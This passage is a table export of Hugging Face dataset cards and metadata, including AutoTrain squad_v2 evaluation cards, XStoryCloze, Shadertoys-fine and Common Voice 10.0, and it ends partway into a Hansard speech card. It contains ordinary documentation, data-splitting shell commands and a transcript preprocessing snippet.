sha
stringlengths 40
40
| text
stringlengths 0
13.4M
| id
stringlengths 2
117
| tags
sequence | created_at
stringlengths 25
25
| metadata
stringlengths 2
31.7M
| last_modified
stringlengths 25
25
|
---|---|---|---|---|---|---|
ae4442bb10bc1cd57779ad99594d94db75420667 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: autoevaluate/roberta-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-94d8b010-11595541 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-22T08:31:44+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "autoevaluate/roberta-base-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-22T08:34:44+00:00 |
91aaa4a325ad414cfcde8690892b7dedb5425530 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: autoevaluate/extractive-question-answering
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-94d8b010-11595542 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-22T08:31:48+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "autoevaluate/extractive-question-answering", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-22T08:34:19+00:00 |
c9fbf6541ad051a61f3bea8ea553af895ddb0449 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: autoevaluate/distilbert-base-cased-distilled-squad
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-94d8b010-11595543 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-22T08:31:54+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "autoevaluate/distilbert-base-cased-distilled-squad", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-22T08:34:25+00:00 |
b87c2d6f00929ca0f2f43e8d1a3532e4b0df069f | XStoryCloze consists of the professionally translated version of the [English StoryCloze dataset](https://cs.rochester.edu/nlp/rocstories/) (Spring 2016 version) to 10 other languages. This dataset is released by Meta AI.
# Languages
ru, zh (Simplified), es (Latin America), ar, hi, id, te, sw, eu, my.
# Data Splits
This dataset is intended to be used for evaluating the zero- and few-shot learning capabilities of multlingual language models. We split the data for each language into train and test (360 vs. 1510 examples, respectively). The released data files for different languages maintain a line-by-line alignment.
# Access English StoryCloze
Please request the original English StoryCloze dataset through the [official channel](https://cs.rochester.edu/nlp/rocstories/). You can create a split of the en data following our data split scheme using the following commands:
```
head -361 spring2016.val.tsv > spring2016.val.en.tsv.split_20_80_train.tsv
head -1 spring2016.val.tsv > spring2016.val.en.tsv.split_20_80_eval.tsv
tail -1510 spring2016.val.tsv >> spring2016.val.en.tsv.split_20_80_eval.tsv
```
# Licence
XStoryCloze is opensourced under [CC BY-SA 4.0](https://creativecommons.org/licenses/by-sa/4.0/legalcode), the same license as the original English StoryCloze.
# Citation
If you use XStoryCloze in your work, please cite
```
@article{DBLP:journals/corr/abs-2112-10668,
author = {Xi Victoria Lin and
Todor Mihaylov and
Mikel Artetxe and
Tianlu Wang and
Shuohui Chen and
Daniel Simig and
Myle Ott and
Naman Goyal and
Shruti Bhosale and
Jingfei Du and
Ramakanth Pasunuru and
Sam Shleifer and
Punit Singh Koura and
Vishrav Chaudhary and
Brian O'Horo and
Jeff Wang and
Luke Zettlemoyer and
Zornitsa Kozareva and
Mona T. Diab and
Veselin Stoyanov and
Xian Li},
title = {Few-shot Learning with Multilingual Language Models},
journal = {CoRR},
volume = {abs/2112.10668},
year = {2021},
url = {https://arxiv.org/abs/2112.10668},
eprinttype = {arXiv},
eprint = {2112.10668},
timestamp = {Tue, 04 Jan 2022 15:59:27 +0100},
biburl = {https://dblp.org/rec/journals/corr/abs-2112-10668.bib},
bibsource = {dblp computer science bibliography, https://dblp.org}
}
```
| Muennighoff/xstory_cloze_data | [
"arxiv:2112.10668",
"region:us"
] | 2022-07-22T08:56:03+00:00 | {} | 2022-07-22T09:00:22+00:00 |
a16580eb510078482c7625c086cb75ca82c53007 |
# Dataset Card for Shadertoys-fine
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Source Data](#source-data)
- [Licensing Information](#licensing-information)
## Dataset Description
- **Repository:** https://github.com/Vipitis/project (private placeholder)
### Dataset Summary
fine variant of the Shadertoys dataset (still WIP), where individual functions are avaialable as Datapoints.
### Supported Tasks and Leaderboards
`language-modeling`: The dataset can be used to train a model for modelling programming languages, which consists in building language models for programming languages.
### Languages
- English (names, comments)
- Shadercode **programming** language
## Dataset Structure
### Data Instances
A data point consists of the function string, it's name as well as a bit of metadata like the author and source URL. (in the future there might be a function string without comments)
```
{
'name': '<type> <name>',
'code': '<type> <name>(<inputs>) { <body> return <outputs>; }\n',
'source': 'https://shadertoy.com/view/<shaderID>',
'author': '<username>'
}
```
A data point in the `return_completion` subset for the return-completion task in [ShaderEval](https://huggingface.co/spaces/Vipitis/ShaderEval) includes just two features:
```
{
'body': '<type> <name> <type> <name>(<inputs>) { <body> return',
'return_statment': ' <outputs>: }\n',
}
```
### Data Fields
- 'name' funciton identifier composed of the type and the name of the function
- 'code' the raw code (including comments) of function.
- 'source' URL to the shader. It might be on a different renderpass
- 'author' username of the shader author
- 'body' the body of the function without the return statement (no comments)
- 'return_statment' the return statement of the function. everything infront of the semicolon is kept and white sapces are stripped in the custome Evaluator.
### Data Splits
Currently available (shuffled):
- train (85.0%)
- test (15.0%)
These splits should be indexed the same across both subsets. So if you are fine-tuning on the `fine` subset you won't get exposed to the `return_completion` test split. However there are many duplicates among both subsets and splits.
## Dataset Creation
Data retrieved starting 2022-07-20
### Source Data
#### Initial Data Collection and Normalization
All data was collected via the [Shadertoy.com API](https://www.shadertoy.com/howto#q2) and then by looking for keywords and counting curly brackets to figure out what is part of a function and what isn't.
#### Who are the source language producers?
Shadertoy.com contributers which publish shaders as 'public+API'
## Licensing Information
The Default [licnese for each Shader](https://www.shadertoy.com/terms) is CC BY-NC-SA 3.0. However, some Shaders might have a different license attached. The Dataset is currently not filtering for any licensis. | Vipitis/Shadertoys-fine | [
"task_categories:text-generation",
"annotations_creators:no-annotation",
"language_creators:machine-generated",
"size_categories:100K<n<1M",
"language:en",
"language:code",
"license:cc-by-nc-sa-3.0",
"code",
"region:us"
] | 2022-07-22T09:45:36+00:00 | {"annotations_creators": ["no-annotation"], "language_creators": ["machine-generated"], "language": ["en", "code"], "license": ["cc-by-nc-sa-3.0"], "multilinguality": [], "size_categories": ["100K<n<1M"], "source_datasets": [], "task_categories": ["text-generation"], "task_ids": [], "pretty_name": "Shadertoys-fine", "tags": ["code"], "dataset_info": [{"config_name": "default", "features": [{"name": "name", "dtype": "string"}, {"name": "code", "dtype": "string"}, {"name": "source", "dtype": "string"}, {"name": "author", "dtype": "string"}], "splits": [{"name": "train"}, {"name": "test"}], "download_size": 154529204, "dataset_size": 0}, {"config_name": "fine", "features": [{"name": "name", "dtype": "string"}, {"name": "code", "dtype": "string"}, {"name": "source", "dtype": "string"}, {"name": "author", "dtype": "string"}], "splits": [{"name": "train", "num_bytes": 119963236, "num_examples": 226910}, {"name": "test", "num_bytes": 20003783, "num_examples": 38356}], "download_size": 154529204, "dataset_size": 139967019}, {"config_name": "return_completion", "features": [{"name": "body", "dtype": "string"}, {"name": "return_statement", "dtype": "string"}], "splits": [{"name": "train", "num_bytes": 37597125, "num_examples": 84843}, {"name": "test", "num_bytes": 6360131, "num_examples": 14248}], "download_size": 154529204, "dataset_size": 43957256}]} | 2023-05-04T21:37:17+00:00 |
94f5828caf1fed6c4e59499abdfcd873a9c030a3 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/roberta-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-b21ddcda-11615545 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-22T10:14:33+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/roberta-base-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-22T10:17:44+00:00 |
9c16af46e39ca7b77c67d091885bafd8cb05ee48 | Simpe Sentimental analysis Dataset checking with AUtoTrain Pipeline | ameerazam08/autotrain-data-imdb | [
"region:us"
] | 2022-07-22T10:43:35+00:00 | {} | 2022-08-08T03:19:44+00:00 |
8bb76e594b68147f1a430e86829d07189622b90d | # Dataset Card for "story_cloze"
## Table of Contents
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
### Dataset Summary
Story Cloze Test' is a new commonsense reasoning framework for evaluating story understanding,
story generation, and script learning.This test requires a system to choose the correct ending
to a four-sentence story.
### Data Instances
- **Size of downloaded dataset files:** 2.03 MB
- **Size of the generated dataset:** 2.03 MB
- **Total amount of disk used:** 2.05 MB
An example of 'train' looks as follows.
```
{'answer_right_ending': 1,
'input_sentence_1': 'Rick grew up in a troubled household.',
'input_sentence_2': 'He never found good support in family, and turned to gangs.',
'input_sentence_3': "It wasn't long before Rick got shot in a robbery.",
'input_sentence_4': 'The incident caused him to turn a new leaf.',
'sentence_quiz1': 'He is happy now.',
'sentence_quiz2': 'He joined a gang.',
'story_id': '138d5bfb-05cc-41e3-bf2c-fa85ebad14e2'}
```
### Data Fields
The data fields are the same among all splits.
- `input_sentence_1`: The first statement in the story.
- `input_sentence_2`: The second statement in the story.
- `input_sentence_3`: The third statement in the story.
- `input_sentence_4`: The forth statement in the story.
- `sentence_quiz1`: first possible continuation of the story.
- `sentence_quiz2`: second possible continuation of the story.
- `answer_right_ending`: correct possible ending; either 1 or 2.
- `story_id`: story id.
### Data Splits
| name |validation |test|
|-------|-----:|---:|
|lang|1871|1871|
| Muennighoff/xstory_cloze | [
"annotations_creators:found",
"language_creators:found",
"multilinguality:multilingual",
"size_categories:1K<n<10K",
"source_datasets:original",
"language:ar",
"language:es",
"language:eu",
"language:hi",
"language:id",
"language:zh",
"language:ru",
"language:my",
"license:unknown",
"other-story-completion",
"region:us"
] | 2022-07-22T10:52:19+00:00 | {"annotations_creators": ["found"], "language_creators": ["found"], "language": ["ar", "es", "eu", "hi", "id", "zh", "ru", "my"], "license": ["unknown"], "multilinguality": ["multilingual"], "size_categories": ["1K<n<10K"], "source_datasets": ["original"], "task_ids": [], "tags": ["other-story-completion"]} | 2022-10-20T18:44:18+00:00 |
de17e62a0b8f40bae1ff1bffd42916d46adc62a2 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: nbroad/deberta-v3-xsmall-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@nbroad](https://huggingface.co/nbroad) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-a5d9cc45-11645552 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-22T12:14:13+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "nbroad/deberta-v3-xsmall-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-22T12:17:28+00:00 |
850e6e9d4e72b0b1bd5b8ecebdb169cc0afecc55 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: distilbert-base-cased-distilled-squad
* Dataset: squad
* Config: plain_text
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@lewtun](https://huggingface.co/lewtun) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad-056210f3-11655553 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-22T14:07:34+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad"], "eval_info": {"task": "extractive_question_answering", "model": "distilbert-base-cased-distilled-squad", "metrics": [], "dataset_name": "squad", "dataset_config": "plain_text", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-22T14:10:00+00:00 |
0a49812b2507cee6824dbd859214a6dc75c3a32f |
# Dataset Card for Common Voice Corpus 10.0
## Table of Contents
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:** https://commonvoice.mozilla.org/en/datasets
- **Repository:** https://github.com/common-voice/common-voice
- **Paper:** https://arxiv.org/abs/1912.06670
- **Leaderboard:** https://paperswithcode.com/dataset/common-voice
- **Point of Contact:** [Anton Lozhkov](mailto:[email protected])
### Dataset Summary
The Common Voice dataset consists of a unique MP3 and corresponding text file.
Many of the 20817 recorded hours in the dataset also include demographic metadata like age, sex, and accent
that can help improve the accuracy of speech recognition engines.
The dataset currently consists of 15234 validated hours in 96 languages, but more voices and languages are always added.
Take a look at the [Languages](https://commonvoice.mozilla.org/en/languages) page to request a language or start contributing.
### Supported Tasks and Leaderboards
The results for models trained on the Common Voice datasets are available via the
[🤗 Speech Bench](https://huggingface.co/spaces/huggingface/hf-speech-bench)
### Languages
```
Abkhaz, Arabic, Armenian, Assamese, Asturian, Azerbaijani, Basaa, Bashkir, Basque, Belarusian, Bengali, Breton, Bulgarian, Cantonese, Catalan, Central Kurdish, Chinese (China), Chinese (Hong Kong), Chinese (Taiwan), Chuvash, Czech, Danish, Dhivehi, Dutch, English, Erzya, Esperanto, Estonian, Finnish, French, Frisian, Galician, Georgian, German, Greek, Guarani, Hakha Chin, Hausa, Hindi, Hungarian, Igbo, Indonesian, Interlingua, Irish, Italian, Japanese, Kabyle, Kazakh, Kinyarwanda, Kurmanji Kurdish, Kyrgyz, Latvian, Lithuanian, Luganda, Macedonian, Malayalam, Maltese, Marathi, Meadow Mari, Moksha, Mongolian, Nepali, Norwegian Nynorsk, Odia, Persian, Polish, Portuguese, Punjabi, Romanian, Romansh Sursilvan, Romansh Vallader, Russian, Sakha, Santali (Ol Chiki), Sardinian, Serbian, Slovak, Slovenian, Sorbian, Upper, Spanish, Swahili, Swedish, Taiwanese (Minnan), Tamil, Tatar, Thai, Tigre, Toki Pona, Turkish, Ukrainian, Urdu, Uyghur, Uzbek, Vietnamese, Votic, Welsh
```
## Dataset Structure
### Data Instances
A typical data point comprises the `path` to the audio file and its `sentence`.
Additional fields include `accent`, `age`, `client_id`, `up_votes`, `down_votes`, `gender`, `locale` and `segment`.
```python
{
'client_id': 'd59478fbc1ee646a28a3c652a119379939123784d99131b865a89f8b21c81f69276c48bd574b81267d9d1a77b83b43e6d475a6cfc79c232ddbca946ae9c7afc5',
'path': 'et/clips/common_voice_et_18318995.mp3',
'audio': {
'path': 'et/clips/common_voice_et_18318995.mp3',
'array': array([-0.00048828, -0.00018311, -0.00137329, ..., 0.00079346, 0.00091553, 0.00085449], dtype=float32),
'sampling_rate': 48000
},
'sentence': 'Tasub kokku saada inimestega, keda tunned juba ammust ajast saati.',
'up_votes': 2,
'down_votes': 0,
'age': 'twenties',
'gender': 'male',
'accent': '',
'locale': 'et',
'segment': ''
}
```
### Data Fields
`client_id` (`string`): An id for which client (voice) made the recording
`path` (`string`): The path to the audio file
`audio` (`dict`): A dictionary containing the path to the downloaded audio file, the decoded audio array, and the sampling rate. Note that when accessing the audio column: `dataset[0]["audio"]` the audio file is automatically decoded and resampled to `dataset.features["audio"].sampling_rate`. Decoding and resampling of a large number of audio files might take a significant amount of time. Thus it is important to first query the sample index before the `"audio"` column, *i.e.* `dataset[0]["audio"]` should **always** be preferred over `dataset["audio"][0]`.
`sentence` (`string`): The sentence the user was prompted to speak
`up_votes` (`int64`): How many upvotes the audio file has received from reviewers
`down_votes` (`int64`): How many downvotes the audio file has received from reviewers
`age` (`string`): The age of the speaker (e.g. `teens`, `twenties`, `fifties`)
`gender` (`string`): The gender of the speaker
`accent` (`string`): Accent of the speaker
`locale` (`string`): The locale of the speaker
`segment` (`string`): Usually an empty field
### Data Splits
The speech material has been subdivided into portions for dev, train, test, validated, invalidated, reported and other.
The validated data is data that has been validated with reviewers and received upvotes that the data is of high quality.
The invalidated data is data has been invalidated by reviewers
and received downvotes indicating that the data is of low quality.
The reported data is data that has been reported, for different reasons.
The other data is data that has not yet been reviewed.
The dev, test, train are all data that has been reviewed, deemed of high quality and split into dev, test and train.
## Data Preprocessing Recommended by Hugging Face
The following are data preprocessing steps advised by the Hugging Face team. They are accompanied by an example code snippet that shows how to put them to practice.
Many examples in this dataset have trailing quotations marks, e.g _“the cat sat on the mat.“_. These trailing quotation marks do not change the actual meaning of the sentence, and it is near impossible to infer whether a sentence is a quotation or not a quotation from audio data alone. In these cases, it is advised to strip the quotation marks, leaving: _the cat sat on the mat_.
In addition, the majority of training sentences end in punctuation ( . or ? or ! ), whereas just a small proportion do not. In the dev set, **almost all** sentences end in punctuation. Thus, it is recommended to append a full-stop ( . ) to the end of the small number of training examples that do not end in punctuation.
```python
from datasets import load_dataset
ds = load_dataset("mozilla-foundation/common_voice_10_0", "en", use_auth_token=True)
def prepare_dataset(batch):
"""Function to preprocess the dataset with the .map method"""
transcription = batch["sentence"]
if transcription.startswith('"') and transcription.endswith('"'):
# we can remove trailing quotation marks as they do not affect the transcription
transcription = transcription[1:-1]
if transcription[-1] not in [".", "?", "!"]:
# append a full-stop to sentences that do not end in punctuation
transcription = transcription + "."
batch["sentence"] = transcription
return batch
ds = ds.map(prepare_dataset, desc="preprocess dataset")
```
## Dataset Creation
### Curation Rationale
[Needs More Information]
### Source Data
#### Initial Data Collection and Normalization
[Needs More Information]
#### Who are the source language producers?
[Needs More Information]
### Annotations
#### Annotation process
[Needs More Information]
#### Who are the annotators?
[Needs More Information]
### Personal and Sensitive Information
The dataset consists of people who have donated their voice online. You agree to not attempt to determine the identity of speakers in the Common Voice dataset.
## Considerations for Using the Data
### Social Impact of Dataset
The dataset consists of people who have donated their voice online. You agree to not attempt to determine the identity of speakers in the Common Voice dataset.
### Discussion of Biases
[More Information Needed]
### Other Known Limitations
[More Information Needed]
## Additional Information
### Dataset Curators
[More Information Needed]
### Licensing Information
Public Domain, [CC-0](https://creativecommons.org/share-your-work/public-domain/cc0/)
### Citation Information
```
@inproceedings{commonvoice:2020,
author = {Ardila, R. and Branson, M. and Davis, K. and Henretty, M. and Kohler, M. and Meyer, J. and Morais, R. and Saunders, L. and Tyers, F. M. and Weber, G.},
title = {Common Voice: A Massively-Multilingual Speech Corpus},
booktitle = {Proceedings of the 12th Conference on Language Resources and Evaluation (LREC 2020)},
pages = {4211--4215},
year = 2020
}
```
| mozilla-foundation/common_voice_10_0 | [
"task_categories:automatic-speech-recognition",
"annotations_creators:crowdsourced",
"language_creators:crowdsourced",
"multilinguality:multilingual",
"source_datasets:extended|common_voice",
"license:cc0-1.0",
"arxiv:1912.06670",
"region:us"
] | 2022-07-22T14:10:26+00:00 | {"annotations_creators": ["crowdsourced"], "language_creators": ["crowdsourced"], "license": ["cc0-1.0"], "multilinguality": ["multilingual"], "size_categories": {"ab": ["10K<n<100K"], "ar": ["100K<n<1M"], "as": ["1K<n<10K"], "ast": ["n<1K"], "az": ["n<1K"], "ba": ["100K<n<1M"], "bas": ["1K<n<10K"], "be": ["100K<n<1M"], "bg": ["1K<n<10K"], "bn": ["100K<n<1M"], "br": ["10K<n<100K"], "ca": ["1M<n<10M"], "ckb": ["100K<n<1M"], "cnh": ["1K<n<10K"], "cs": ["10K<n<100K"], "cv": ["10K<n<100K"], "cy": ["100K<n<1M"], "da": ["1K<n<10K"], "de": ["100K<n<1M"], "dv": ["10K<n<100K"], "el": ["10K<n<100K"], "en": ["1M<n<10M"], "eo": ["1M<n<10M"], "es": ["100K<n<1M"], "et": ["10K<n<100K"], "eu": ["100K<n<1M"], "fa": ["100K<n<1M"], "fi": ["10K<n<100K"], "fr": ["100K<n<1M"], "fy-NL": ["10K<n<100K"], "ga-IE": ["1K<n<10K"], "gl": ["10K<n<100K"], "gn": ["1K<n<10K"], "ha": ["1K<n<10K"], "hi": ["10K<n<100K"], "hsb": ["1K<n<10K"], "hu": ["10K<n<100K"], "hy-AM": ["1K<n<10K"], "ia": ["10K<n<100K"], "id": ["10K<n<100K"], "ig": ["1K<n<10K"], "it": ["100K<n<1M"], "ja": ["10K<n<100K"], "ka": ["1K<n<10K"], "kab": ["100K<n<1M"], "kk": ["1K<n<10K"], "kmr": ["10K<n<100K"], "ky": ["10K<n<100K"], "lg": ["100K<n<1M"], "lt": ["10K<n<100K"], "lv": ["1K<n<10K"], "mdf": ["n<1K"], "mhr": ["10K<n<100K"], "mk": ["n<1K"], "ml": ["1K<n<10K"], "mn": ["10K<n<100K"], "mr": ["10K<n<100K"], "mt": ["10K<n<100K"], "myv": ["1K<n<10K"], "nan-tw": ["10K<n<100K"], "ne-NP": ["n<1K"], "nl": ["10K<n<100K"], "nn-NO": ["n<1K"], "or": ["1K<n<10K"], "pa-IN": ["1K<n<10K"], "pl": ["100K<n<1M"], "pt": ["100K<n<1M"], "rm-sursilv": ["1K<n<10K"], "rm-vallader": ["1K<n<10K"], "ro": ["10K<n<100K"], "ru": ["100K<n<1M"], "rw": ["1M<n<10M"], "sah": ["1K<n<10K"], "sat": ["n<1K"], "sc": ["n<1K"], "sk": ["10K<n<100K"], "sl": ["10K<n<100K"], "sr": ["1K<n<10K"], "sv-SE": ["10K<n<100K"], "sw": ["100K<n<1M"], "ta": ["100K<n<1M"], "th": ["100K<n<1M"], "tig": ["n<1K"], "tok": ["1K<n<10K"], "tr": ["10K<n<100K"], "tt": ["10K<n<100K"], "ug": ["10K<n<100K"], "uk": ["10K<n<100K"], "ur": ["100K<n<1M"], "uz": ["100K<n<1M"], "vi": ["10K<n<100K"], "vot": ["n<1K"], "yue": ["10K<n<100K"], "zh-CN": ["100K<n<1M"], "zh-HK": ["100K<n<1M"], "zh-TW": ["100K<n<1M"]}, "source_datasets": ["extended|common_voice"], "task_categories": ["automatic-speech-recognition"], "paperswithcode_id": "common-voice", "pretty_name": "Common Voice Corpus 10.0", "language_bcp47": ["ab", "ar", "as", "ast", "az", "ba", "bas", "be", "bg", "bn", "br", "ca", "ckb", "cnh", "cs", "cv", "cy", "da", "de", "dv", "el", "en", "eo", "es", "et", "eu", "fa", "fi", "fr", "fy-NL", "ga-IE", "gl", "gn", "ha", "hi", "hsb", "hu", "hy-AM", "ia", "id", "ig", "it", "ja", "ka", "kab", "kk", "kmr", "ky", "lg", "lt", "lv", "mdf", "mhr", "mk", "ml", "mn", "mr", "mt", "myv", "nan-tw", "ne-NP", "nl", "nn-NO", "or", "pa-IN", "pl", "pt", "rm-sursilv", "rm-vallader", "ro", "ru", "rw", "sah", "sat", "sc", "sk", "sl", "sr", "sv-SE", "sw", "ta", "th", "tig", "tok", "tr", "tt", "ug", "uk", "ur", "uz", "vi", "vot", "yue", "zh-CN", "zh-HK", "zh-TW"], "extra_gated_prompt": "By clicking on \u201cAccess repository\u201d below, you also agree to not attempt to determine the identity of speakers in the Common Voice dataset."} | 2023-07-29T15:00:14+00:00 |
bb5a0bf1924a55a85433166cacc8384fd7c099dc | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: nbroad/xdistil-l12-h384-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@nbroad](https://huggingface.co/nbroad) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-4938eeea-11665554 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-22T14:10:40+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "nbroad/xdistil-l12-h384-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-22T14:13:27+00:00 |
0513e0c12e945fa315e4fb166e3d741cb4413105 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/roberta-base-squad2-distilled
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@yjernite](https://huggingface.co/yjernite) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-b7567fd1-11675555 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-22T14:51:13+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/roberta-base-squad2-distilled", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-22T14:54:17+00:00 |
ef655a3bfc18d977bb7d657ab87a6de404c883fc |
# Dataset Card for Hansard speech
## Table of Contents
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
